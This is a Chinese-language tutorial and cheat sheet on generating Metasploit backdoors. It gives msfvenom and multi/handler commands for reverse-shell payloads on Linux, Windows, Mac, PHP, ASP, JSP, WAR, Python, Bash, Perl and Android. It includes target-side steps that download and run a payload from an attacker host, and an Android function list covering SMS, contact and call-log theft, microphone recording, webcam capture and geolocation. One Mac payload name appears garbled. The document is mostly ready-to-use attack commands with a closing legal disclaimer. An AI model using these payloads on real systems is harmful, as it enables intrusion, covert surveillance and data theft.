初识MSF后门技术
字数 1040 2025-08-20 18:18:10
MSF后门技术全面指南
0x01 前言
后门技术是渗透测试中至关重要的环节,本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术,涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。
0x02 MSF生成Linux后门实战
实战背景
- 目标系统:使用Shiro框架的登录界面
- 漏洞利用:Shiro反序列化漏洞
利用Shiro反序列化漏洞
- 使用Burpsuite抓包识别Shiro特征字段
- 使用专用工具检测并确认漏洞存在
- 成功反弹shell
植入Linux后门流程
生成后门
msfconsole
use exploit/multi/handler
set lhost xxx.xxx.xxx.xxx
set lport 9991
set payload linux/x86/meterpreter/reverse_tcp
run
目标机操作
wget http://xxx.xxx.xxx/shell
chmod 777 shell
./shell
0x03 MSF生成Windows后门
实验环境
- 攻击机:个人VPS
- 靶机:Windows Server 2012
生成Windows后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f exe > shell.exe
MSF监听配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP>
set LPORT <Your Port>
run
0x04 MSF生成PHP后门
实验环境
- 攻击机:个人VPS
- 靶机:CentOS系统
生成PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.php
目标机操作
wget http://xxx.xxx.xxx/text.php
php ./text.php
0x05 MSF生成Android后门
实验环境
- 攻击机:个人VPS
- 靶机:夜神安卓模拟器
生成Android后门
msfvenom -p android/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port R > /root/android.apk
Android后门功能
check_root- 检查root权限dump_calllog- 下载通讯记录dump_contacts- 下载联系人dump_sms- 下载短信send_sms- 发送短信record_mic- 录音webcam_list- 查看摄像头webcam_snap- 拍照webcam_stream- 连续拍照geolocate- 获取地理位置upload- 上传文件download- 下载文件shell- 获取shell
0x06 MSF生成各类后门总结
Binaries后门
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe > shell.exe
Mac
msfvenom -p osx/x86ell_reverse_tcp LHOST=<IP> LPORT=<Port> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<Port> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<Port> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<Port> -f raw > shell.pl
Shellcode生成
使用msfvenom --help-formats查看支持的格式参数
Linux Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
Windows Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
Mac Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f <language>
注意事项
- 实际使用时需替换
<IP>和<Port>为实际值 - 本文仅用于学习研究,请遵守法律法规
- 实际渗透测试需获得授权方可进行